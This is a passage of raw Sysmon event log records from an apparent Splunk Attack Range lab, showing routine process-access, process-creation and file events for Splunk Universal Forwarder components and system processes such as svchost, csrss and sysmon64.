Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807910Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807909Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807908Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807901Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807900Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.310{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807899Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.294{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.295{0C1E0330-F530-60EB-8179-00000000D001}1880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:24.232{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284E2530E773F59A75FAE4E52203BC6C,SHA256=EC4EEC3820014CEC75CE7EB1463536C09B2B3D5F61FCD73EFFBB518C756AB4D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049683Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:25.699{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB7D43BCD9678C942163AF7E460C1E4,SHA256=E5CE744D06E492B3CB908D52806E08DFDDC7D6229716D024FD72005D399F4D43,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000807939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807938Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x8000000000000000807937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.669{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:25.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:54:25.653{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:25.653{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F531-60EB-8379-00000000D001}852C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 